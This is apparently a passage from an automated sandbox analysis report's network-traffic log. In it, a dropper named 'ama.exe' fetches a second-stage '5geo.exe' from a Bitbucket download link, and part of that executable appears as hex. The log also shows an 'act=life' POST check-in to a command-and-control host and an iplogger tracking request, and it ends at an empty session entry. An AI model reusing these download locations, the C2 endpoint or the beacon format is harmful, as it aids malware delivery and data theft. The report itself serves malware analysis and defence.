2024-06-23 22:10:30 UTC	1378	IN	Data Raw: a9 77 9a 6a 99 01 30 b4 7f be 87 5c 00 fb b7 2a a3 87 28 6b d0 78 07 32 ce 54 8c ba d0 d9 62 40 bd 01 d8 44 0e 16 ab e9 47 2e f5 0b d0 0f bc 4f 94 98 9c 83 fa 1d 78 6d ce d9 55 fe af 90 75 e3 06 94 d6 53 27 e9 80 6a 60 f4 85 5e 51 4b ee 9c 00 e6 72 0b 46 ca 0a 39 ca 53 b0 db 3d c1 aa 41 08 07 5a a8 69 bd 89 2e 08 ee 3c 0b 80 1b 65 05 98 31 ff 6c f7 db db 97 ec 81 71 d7 90 db fc a9 db 24 35 4d ca 60 52 ec 3d ca 2d 6c ce 7e 36 4c b9 93 26 b7 d1 73 d5 7c 9b 65 12 9d 74 7d 16 0c b0 31 f5 de b6 7d 14 4f 59 49 e3 b4 7e 3f 6b 5c c3 f7 67 92 85 09 60 6e 37 61 ee f3 93 b9 f8 fd 3a fc f4 79 cd cf 53 ef ab cd 64 d6 6e 76 8d 9e 25 c3 b4 25 a6 4c d6 33 99 6c c7 47 66 1f 8e b0 43 d0 0f c9 d6 f1 82 84 c7 78 85 65 1a 9e 63 d4 61 9d 60 ee 26 d5 ba 76 93 e6 53 88 89 be bd Data Ascii: wj0\*(kx2Tb@DG.OxmUuS'j`^QKrF9S=AZi.<e1lq$5M`R=-l~6L&s\|et}1}OYI~?k\g`n7a:ySdnv%%L3lGfCxeca`&vS
2024-06-23 22:10:30 UTC	1378	IN	Data Raw: f2 1d f0 bd a7 2d 7f 8b 2c c9 bd 49 40 1c 78 2b d2 28 a9 67 22 8d 74 3c eb 87 43 12 c5 5a b4 9f 26 86 7b 9d 38 9c 98 f1 42 84 4c 1c ed 99 d7 7a 31 2f ad e8 09 ca 2b e7 c9 eb 5e 92 27 af 1f f3 16 4c 96 d7 47 79 cb 1d 79 89 66 b8 9a 34 07 89 ef 2a d8 a1 f7 58 28 29 0e fe cd 91 1a 27 df df 7e a1 6d 95 a3 38 36 01 8b 69 98 14 a9 a0 26 a1 91 16 1c 80 5c 40 67 57 6d de 71 96 94 5a 08 96 7e 68 c7 af 6b 97 0c 83 e5 11 5b 5f dc 67 44 4d b5 5f 18 a5 c2 e0 0e 42 28 37 fa b4 22 8d 8d da 4d 8d 62 b3 27 4e ce 24 51 81 89 42 65 3f 0e 90 5f 2e d3 eb 24 5a d0 a2 70 fe 61 e9 16 72 8d 62 39 0c 54 5b be 3a 7e 04 a0 da cb 2a 51 9f 63 6c 4d 2e a4 2d d0 51 cb e7 a0 ba 10 9b fb 44 e5 b8 ec 49 9f fe 9b af 59 ae 03 98 04 77 c2 c1 8d 20 16 bb 2a 61 f1 4d 2f 42 99 79 68 11 f9 0f 40 Data Ascii: -,I@x+(g"t<CZ&{8BLz1/+^'LGyyf4X()'~m86i&\@gWmqZ~hk[_gDM_B(7"Mb'N$QBe?_.$Zparb9T[:~QclM.-QDIYw *aM/Byh@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49766	104.192.141.1	443	6200	C:\Users\user\AppData\Local\Temp\1000007001\ama.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:32 UTC	96	OUT	GET /tons1/tronssss/downloads/5geo.exe HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
2024-06-23 22:10:33 UTC	4309	IN	HTTP/1.1 302 Found server: envoy x-usage-quota-remaining: 999459.640 vary: Accept-Language, Origin x-usage-request-cost: 549.50 cache-control: max-age=0, no-cache, no-store, must-revalidate, private Content-Type: text/html; charset=utf-8 x-b3-traceid: 42decc409a798fd5 x-usage-output-ops: 0 x-used-mesh: False x-dc-location: Micros-3 content-security-policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: ; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io .ingest. [TRUNCATED] Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Date: Sun, 23 Jun 2024 22:10:33 GMT x-usage-user-time: 0.010666 x-usage-system-time: 0.005819 location: https://bbuseruploads.s3.amazonaws.com/2e88b5ff-15af-42da-aaae-e65938d632e2/downloads/8ec94b2f-0bee-467a-979c-d152d74b6b83/5geo.exe?response-content-disposition=attachment%3B%20filename%3D%225geo.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJIBTCJVT&Signature=tjx3UYEd%2Fu3DTSp8pqQDsBEn5Is%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEO%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIAePWN9bqbzKFV4W1jlqY%2B2IC9HQ1lq9ul%2FsBNxJqUGfAiEAgXldbcYRKjI9j0sReAGp9XE3D%2FC7L%2BjKiECYbFauZ%2B0qsAIIl%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJa1Oxy7WjMYvEFUGiqEAi9apPZmrQbF%2FK2PWFsJSGhkeSLVH5VtT7kV15hVFRE77icQ6LzMNkeJigGbz4sHg3TZ3lopaxd64ZgYeB7rWGtVHNATJsmZoxA%2F9Vd48ItxGuW8d9%2BYG9fm0Tu8nVDW22rOhFWQ4SQPo7gP6uMWw%2Fu9Q1EJGAKOe4JiffKVLi3uZuPi8AYB8j1MquDBf3WAgb2vv%2FgSoPQRObbX0OkfyFeUDo%2Bna80Zh4v6XDTaHvC5JTODmeHg41UFnkzAP4HFYjVqgcnXxAf4s703Ks6GNu8YabTRCs%2FrgySi0qjcvrgsQ2O5t6T0h9lVoiZP9evoDAjP5%2FNNWiCymkV1MYArZWOoOKdGMMq44rMGOp0BCdM12mesubPrtlg52rlPU1gfmywiP2Un5s72UeH9ztPaKWvzHLGcQxg71ozZosXuHk5%2FNy5tI8t [TRUNCATED] expires: Sun, 23 Jun 2024 22:10:33 GMT x-served-by: defe68fee443 x-envoy-upstream-service-time: 39 content-language: en x-view-name: bitbucket.apps.downloads.views.download_file x-b3-spanid: 42decc409a798fd5 x-static-version: 3407f9d2ac43 x-render-time: 0.030927658081054688 Connection: close x-usage-input-ops: 0 x-version: 3407f9d2ac43 x-request-count: 3473 x-frame-options: SAMEORIGIN X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache" Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49770	3.5.27.203	443	6200	C:\Users\user\AppData\Local\Temp\1000007001\ama.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:34 UTC	1219	OUT	GET /2e88b5ff-15af-42da-aaae-e65938d632e2/downloads/8ec94b2f-0bee-467a-979c-d152d74b6b83/5geo.exe?response-content-disposition=attachment%3B%20filename%3D%225geo.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJIBTCJVT&Signature=tjx3UYEd%2Fu3DTSp8pqQDsBEn5Is%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEO%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIAePWN9bqbzKFV4W1jlqY%2B2IC9HQ1lq9ul%2FsBNxJqUGfAiEAgXldbcYRKjI9j0sReAGp9XE3D%2FC7L%2BjKiECYbFauZ%2B0qsAIIl%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJa1Oxy7WjMYvEFUGiqEAi9apPZmrQbF%2FK2PWFsJSGhkeSLVH5VtT7kV15hVFRE77icQ6LzMNkeJigGbz4sHg3TZ3lopaxd64ZgYeB7rWGtVHNATJsmZoxA%2F9Vd48ItxGuW8d9%2BYG9fm0Tu8nVDW22rOhFWQ4SQPo7gP6uMWw%2Fu9Q1EJGAKOe4JiffKVLi3uZuPi8AYB8j1MquDBf3WAgb2vv%2FgSoPQRObbX0OkfyFeUDo%2Bna80Zh4v6XDTaHvC5JTODmeHg41UFnkzAP4HFYjVqgcnXxAf4s703Ks6GNu8YabTRCs%2FrgySi0qjcvrgsQ2O5t6T0h9lVoiZP9evoDAjP5%2FNNWiCymkV1MYArZWOoOKdGMMq44rMGOp0BCdM12mesubPrtlg52rlPU1gfmywiP2Un5s72UeH9ztPaKWvzHLGcQxg71ozZosXuHk5%2FNy5tI8ttB2WNlIjfQ0HDWeRHpaXqqmeqRcQNOVd4dmQ%2B7mdAh [TRUNCATED] Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
2024-06-23 22:10:34 UTC	569	IN	HTTP/1.1 200 OK x-amz-id-2: 61cEbtGGTKZHtcnxeH9TTvmofsoIo1uwZNYhbXiBq0EsADLKjabedTvythBjH9vdcwsX3B4mZ5kPW9rjeHy59FXicgaR/HfVpDCjn29jj90= x-amz-request-id: B2GMXYY8E49YGH2D Date: Sun, 23 Jun 2024 22:10:35 GMT Last-Modified: Sun, 23 Jun 2024 21:17:38 GMT ETag: "6863d8f623b5da333280f965ea7f3399" x-amz-server-side-encryption: AES256 x-amz-version-id: Q4eTflHyCsyX0R3hMXvpTgITCqn096Dr Content-Disposition: attachment; filename="5geo.exe" Accept-Ranges: bytes Content-Type: application/x-msdownload Server: AmazonS3 Content-Length: 311296 Connection: close
2024-06-23 22:10:34 UTC	15724	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 98 e5 77 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b4 03 00 00 08 01 00 00 00 00 00 70 97 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf f6 03 00 78 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELwfp@@x
2024-06-23 22:10:34 UTC	16384	IN	Data Raw: 0f 96 c3 83 3e 00 89 5c 24 10 75 1e 8b 46 7c 8b 8e 8c 00 00 00 8b 00 29 c8 05 34 b3 fe ff 3d 33 b3 fe ff 77 05 03 4e 74 eb 06 8d 8e 72 92 03 00 89 4e 30 89 4c 24 18 8d 81 bc 4c 01 00 89 46 34 c7 46 58 00 00 00 00 c7 46 5c 00 00 00 00 8b 46 2c 0f b6 18 0f b6 4e 38 d3 eb 88 18 8b 4e 08 31 c0 83 7e 38 08 0f 94 c0 29 46 28 f7 c1 00 10 00 00 74 0a 83 7e 64 00 0f 84 12 01 00 00 89 54 24 0c 83 fa 04 ba 00 00 00 00 0f 94 c2 8b 5e 44 89 d9 d3 e2 8d 6e 44 8d 46 48 89 04 24 0b 56 48 89 56 48 43 89 5e 44 83 fb 08 0f 83 9c 00 00 00 8b 46 30 89 44 24 04 31 c0 80 7c 24 10 00 89 6c 24 10 75 3c 89 54 24 08 b0 01 f6 46 0a 04 75 07 83 7e 3c 30 0f 92 c0 0f b6 d0 89 f1 e8 34 2b 00 00 8b 4e 3c 85 c9 0f 84 d2 00 00 00 8b 56 30 2b 54 24 04 42 39 ca 8b 54 24 08 0f 82 c2 00 00 00 Data Ascii: >\$uF\|)4=3wNtrN0L$LF4FXF\F,N8N1~8)F(t~dT$^DnDFH$VHVHC^DF0D$1\|$l$u<T$Fu~<04+N<V0+T$B9T$
2024-06-23 22:10:34 UTC	1024	IN	Data Raw: b4 00 00 00 8b 5c 24 14 8b 44 85 00 8b 6c 24 28 8b 54 24 04 89 04 ba e9 c8 fe ff ff 83 3c 24 00 0f 84 35 04 00 00 8b 0c 24 83 f9 01 75 0e 8b 44 24 04 66 c7 00 01 00 e9 e4 02 00 00 8b 54 24 04 0f b7 42 04 66 01 02 83 f9 03 0f 8c 33 01 00 00 bf 02 00 00 00 b8 02 00 00 00 29 c8 89 44 24 08 ba 01 00 00 00 31 f6 8b 44 24 04 eb 25 90 90 90 90 90 90 90 0f b7 0c b0 66 01 0c 90 66 89 14 b0 46 8b 4c 24 08 01 d1 41 42 83 f9 01 0f 84 0d 01 00 00 0f b7 0c b0 3b 3c 24 7d 09 0f b7 2c b8 66 39 e9 73 10 66 89 0c 90 66 89 14 b0 46 3b 3c 24 7d c2 eb 0a 47 66 89 2c 90 3b 3c 24 7d b6 39 d6 7d 12 0f b7 0c b0 0f b7 2c b8 66 39 e9 72 a9 eb 07 90 90 90 0f b7 2c b8 0f b7 0c 90 47 89 7c 24 18 89 cf 21 ef 31 e9 8d 0c 79 8b 7c 24 18 66 89 0c 90 eb 8d 89 f1 83 e1 fe 8b 54 24 10 01 c2 Data Ascii: \$Dl$(T$<$5$uD$fT$Bf3)D$1D$%ffFL$AB;<$},f9sffF;<$}Gf,;<$}9},f9r,G\|$!1y\|$fT$
2024-06-23 22:10:34 UTC	16384	IN	Data Raw: 83 c1 04 89 44 94 30 83 f9 20 75 d8 85 d2 7e 3b 42 31 c9 31 c0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 8b 74 94 2c d3 e6 01 f0 4a 41 83 fa 01 77 f1 ba 01 00 00 00 8b 8c 24 cc 15 00 00 d3 e2 39 d0 0f 85 88 02 00 00 eb 10 89 d1 ba 01 00 00 00 d3 e2 31 c0 e9 76 02 00 00 c1 e3 05 8b 74 24 10 8d 04 1e 05 12 8f 00 00 68 20 01 00 00 6a 00 50 e8 7d 03 00 00 83 c4 0c 8b 44 24 24 01 f0 05 52 88 00 00 68 40 02 00 00 6a 00 50 e8 62 03 00 00 83 c4 0c 83 bc 24 cc 15 00 00 00 0f 8e d7 00 00 00 83 44 24 04 fe b8 01 00 00 00 eb 1d 90 90 90 90 90 8b 3c 24 89 3c 24 8d 48 01 3b 84 24 cc 15 00 00 89 c8 0f 84 ae 00 00 00 8b 7c 84 30 85 ff 7e e0 89 fa 83 e2 03 74 49 89 7c 24 08 8b 0c 24 8b 74 24 04 8d 2c 8e 31 f6 90 90 90 90 90 90 90 90 90 0f b7 7d 00 89 d9 8b 5c 24 10 01 Data Ascii: D0 u~;B11t,JAw$91vt$h jP}D$$Rh@jPb$D$<$<$H;$\|0~tI\|$$t$,1}\$
2024-06-23 22:10:34 UTC	1024	IN	Data Raw: 00 00 c7 01 00 00 00 00 8b 86 d4 02 00 00 8b 00 8b 09 8b 04 88 8b 0d d8 0f 44 00 81 f1 27 56 6e 7f 29 c8 ff e0 89 46 08 8b 8e 00 02 00 00 81 f1 df 3f b8 1e 8b 86 04 02 00 00 8b 00 8b 04 88 8b 0d 10 0f 44 00 81 f1 57 f5 63 5e 29 c8 8b 96 10 02 00 00 ff e0 e8 4a ca ff ff 8b 8e 10 03 00 00 c7 01 00 00 00 00 8b 86 18 03 00 00 8b 00 8b 09 8b 04 88 8b 0d a0 0f 44 00 81 f1 dc b7 ac 51 29 c8 8b be 08 03 00 00 ff e0 8b 46 04 83 ec 04 89 04 24 e8 4d 95 02 00 83 c4 04 8b 8e 5c 03 00 00 81 f1 f6 ab a6 3a 8b 86 60 03 00 00 8b 00 8b 04 88 8b 0d bc 10 44 00 81 f1 32 c8 13 01 29 c8 ff e0 40 7d f3 15 c4 bb 0c 03 8b 86 28 02 00 00 35 4e 20 16 24 8b 8e 2c 02 00 00 8b 09 8b 04 81 8b 0d 10 11 44 00 81 f1 63 40 10 9e 29 c8 ff e0 8b 45 0c 89 86 9c 01 00 00 8a 46 48 88 46 5c c6 Data Ascii: D'Vn)F?DWc^)JDQ)F$M\:`D2)@}(5N $,Dc@)EFHF\
2024-06-23 22:10:34 UTC	16384	IN	Data Raw: 8b 46 20 40 89 46 20 8b 46 20 83 f8 16 72 ae 8b 7e 34 8b 5e 30 eb 00 8b 46 2c 83 ec 1c 8b 8e 9c 01 00 00 89 4c 24 08 8d 8e 80 01 00 00 89 4c 24 04 89 04 24 c7 44 24 18 00 00 80 00 c7 44 24 14 00 00 00 00 c7 44 24 10 00 00 00 00 c7 44 24 0c 00 00 00 00 ff 96 a0 01 00 00 8b 96 fc 01 00 00 c7 02 01 00 00 00 8b 0b 8b 12 8b 0c 91 8b 15 00 0f 44 00 81 f2 ac 94 fd 49 29 d1 ff e1 a1 0c 88 44 00 8b 4e 08 83 ec 08 89 0c 24 c7 44 24 04 00 00 00 00 ff d0 31 c9 85 c0 0f 95 c1 8b 96 44 02 00 00 89 0a 8b 86 4c 02 00 00 8b 00 8b 0a 8b 04 88 8b 0d 48 0f 44 00 81 f1 ff cd 5c 61 29 c8 ff e0 8b 45 20 31 c9 85 c0 0f 95 c1 8b 96 70 03 00 00 89 0a 8b 07 8b 0a 8b 04 88 8b 0d d0 10 44 00 81 f1 f6 f3 39 8c 29 c8 ff e0 e8 b5 c5 ff ff 8b 8e 1c 03 00 00 c7 01 00 00 00 00 8b 86 28 03 Data Ascii: F @F F r~4^0F,L$L$$D$D$D$D$DI)DN$D$1DLHD\a)E 1pD9)(
2024-06-23 22:10:34 UTC	1024	IN	Data Raw: 89 18 83 c0 04 89 46 0c 31 c0 85 db 0f 94 c0 8b 04 85 48 21 44 00 8b 0d 50 21 44 00 ba be 8e 88 eb 31 d1 01 c8 40 ff e0 8d 04 5b 8b 7e 0c 8d 04 87 8b 15 64 21 44 00 b9 a1 f8 76 aa 31 ca 42 c7 07 00 00 00 00 c7 47 04 00 00 00 00 c7 47 08 00 00 00 00 83 c7 0c 31 c9 39 c7 0f 94 c1 8b 0c 8d 5c 21 44 00 01 d1 ff e1 90 90 90 90 90 90 90 90 90 90 90 90 c7 07 00 00 00 00 c7 47 04 00 00 00 00 c7 47 08 00 00 00 00 83 c7 0c 31 c9 39 c7 0f 94 c1 8b 0c 8d 5c 21 44 00 01 d1 ff e1 8b 46 4c 8b 4e 0c 89 08 31 ff 90 90 90 90 90 90 90 90 90 90 90 90 90 8b 86 14 01 00 00 89 38 31 c0 39 df 0f 92 c0 8b 04 85 80 21 44 00 8b 0d 88 21 44 00 ba 0a a4 44 ac 31 d1 01 c8 40 ff e0 57 8b 86 00 01 00 00 ff 30 e8 0a 1d ff ff 83 c4 08 8b 9e a0 01 00 00 89 03 8b be 88 00 00 00 66 c7 07 81 Data Ascii: F1H!DP!D1@[~d!Dv1BGG19\!DGG19\!DFLN1819!D!DD1@W0f
2024-06-23 22:10:34 UTC	16384	IN	Data Raw: 8b 4e 04 88 04 0a ff 46 04 8b 46 04 83 f8 0e 72 c3 6a 05 52 8b 46 1c ff 30 e8 a6 18 ff ff 83 c4 0c 31 c9 85 c0 0f 95 c1 8b 04 8d 58 1d 44 00 8b 0d 60 1d 44 00 ba dc 8d 83 3f 31 d1 01 c8 40 ff e0 8b 56 68 66 c7 02 12 8d 8b 86 4c 01 00 00 66 c7 40 08 00 00 c7 40 04 00 00 00 00 c7 00 00 00 00 00 c7 46 04 00 00 00 00 8b 46 04 83 f8 0b 77 3a 90 90 90 8b 46 04 8b 4e 04 0f b6 0c 0a 8d 90 be 8a 7c 38 05 be 00 00 00 21 c8 09 ca 29 c2 89 56 08 8b 56 68 8b 46 08 04 ce 8b 4e 04 88 04 0a ff 46 04 8b 46 04 83 f8 0c 72 c9 6a 02 52 8b 46 1c ff 30 e8 0c 18 ff ff 83 c4 0c 31 c9 85 c0 0f 95 c1 8b 04 8d 64 1d 44 00 8b 0d 6c 1d 44 00 ba 85 46 f1 97 31 d1 01 c8 40 ff e0 8b 96 04 01 00 00 66 c7 02 64 81 c7 42 06 00 00 00 00 c7 42 02 00 00 00 00 c7 46 04 00 00 00 00 8b 46 04 83 Data Ascii: NFFrjRF01XD`D?1@VhfLf@@FFw:FN\|8!)VVhFNFFrjRF01dDlDF1@fdBBFF
2024-06-23 22:10:34 UTC	1024	IN	Data Raw: 50 53 57 e8 ec 9b ff ff 83 c4 0c 0f b7 8c 24 30 01 00 00 66 89 0e 83 c6 02 3b 74 24 08 73 06 01 c7 39 df 72 cf 66 c7 06 00 00 89 f7 e9 96 fa ff ff 57 e8 ad 0d 02 00 83 c4 04 90 90 90 90 90 90 90 90 90 90 57 e8 9a 0d 02 00 83 c4 04 a1 ac 25 44 00 8b 0d b0 25 44 00 31 d9 8d 14 01 42 b8 04 00 00 00 31 c9 ff e2 66 c7 84 24 30 01 00 00 0c 07 c6 84 24 32 01 00 00 94 c7 84 24 33 01 00 00 00 00 00 00 66 c7 84 24 37 01 00 00 00 00 c7 44 24 38 00 00 00 00 8b 44 24 38 83 f8 08 77 50 90 90 90 90 90 8b 44 24 38 8b 4c 24 38 0f b6 8c 0c 30 01 00 00 8d 90 ed 00 00 00 01 c8 21 ca 01 d2 29 d0 05 ed f5 64 75 89 84 24 b0 00 00 00 8b 84 24 b0 00 00 00 04 85 8b 4c 24 38 88 84 0c 30 01 00 00 ff 44 24 38 8b 44 24 38 83 f8 09 72 b5 8d 84 24 30 01 00 00 50 57 e8 f7 d0 fe ff 83 c4 Data Ascii: PSW$0f;t$s9rfWW%D%D1B1f$0$2$3f$7D$8D$8wPD$8L$80!)du$$L$80D$8D$8r$0PW
2024-06-23 22:10:34 UTC	16384	IN	Data Raw: 50 8d 14 08 21 c8 01 c0 29 c2 89 14 24 8b 04 24 04 4b 8b 4c 24 04 88 44 0c 10 ff 44 24 04 8b 44 24 04 83 f8 08 72 bd 8b 0d 38 9c 44 00 f7 d7 85 c9 74 29 8b 54 24 10 31 db a1 3c 9c 44 00 90 90 90 90 90 90 81 3c d8 10 16 08 11 74 07 43 39 d9 75 f2 eb 08 8b 44 d8 04 39 d0 75 29 c1 ef 1f 8b 04 bd 88 25 44 00 8b 0d 90 25 44 00 ba 3b 4c 83 02 31 d1 8d 14 01 42 31 c0 b9 01 00 00 00 bb e3 85 6b 21 ff e2 ff 74 24 08 6a 01 ff 35 40 9c 44 00 50 e8 6d 27 02 00 83 c4 10 c1 ef 1f 8b 04 bd 88 25 44 00 8b 0d 90 25 44 00 ba 3b 4c 83 02 31 d1 8d 14 01 42 31 c0 b9 01 00 00 00 bb e3 85 6b 21 ff e2 8b 84 24 a0 00 00 00 8d 65 f4 5e 5f 5b 5d c3 cc cc 55 53 57 56 83 ec 10 8b 5c 24 28 8b 6c 24 24 0f b6 44 24 2c c7 01 00 00 00 00 c7 41 04 00 00 00 00 89 4c 24 04 88 41 08 31 c0 90 Data Ascii: P!)$$KL$DD$D$r8Dt)T$1<D<tC9uD9u)%D%D;L1B1k!t$j5@DPm'%D%D;L1B1k!$e^_[]USWV\$(l$$D$,AL$A1

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.5	49769	172.67.144.241	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:34 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: facilitycoursedw.shop
2024-06-23 22:10:34 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-06-23 22:10:34 UTC	816	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vn6h6lfp0foda8e28k6t6bhmuj; expires=Thu, 17-Oct-2024 15:57:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YfylKm917k%2BpsNmw8CJpjmJZaVqY%2Fnd8Aq7cGp5DiHstEw%2F1aPeV9uw1DI0h6%2BAPtXnc6cSwVzi%2FBoT0EhuHGpGJWxB%2FtlEnXWzKEyEjSGz7j%2FCQLG7i2SFTMj98i%2FKguaTvWzQbEoA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cf15df1642e7-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 22:10:34 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-06-23 22:10:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49771	172.67.167.249	443	8108	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:34 UTC	659	OUT	GET /1lLub HTTP/1.1 Host: iplogger.co Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-23 22:10:35 UTC	1141	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:35 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close set-cookie: 54493797137263905=2; expires=Mon, 23 Jun 2025 22:10:35 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict set-cookie: clhf03028ja=8.46.123.33; expires=Mon, 23 Jun 2025 22:10:35 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict memory: 0.46945953369140625 expires: Sun, 23 Jun 2024 22:10:35 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2PxtxjiPxzmMV5pPcqor7t8wQJEor2iDyQtSG%2FgS%2BxwsysXsG9BY3IH3rMmYvrTwfMmfon4Hs909PrszSZ%2BIROVnnYrQiD6sfjSjd9qrGf4mt2YtCifCMkmUJeIiZQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cf16dfff0f8b-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 22:10:35 UTC	122	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-06-23 22:10:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49773	84.32.84.161	443	8108	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
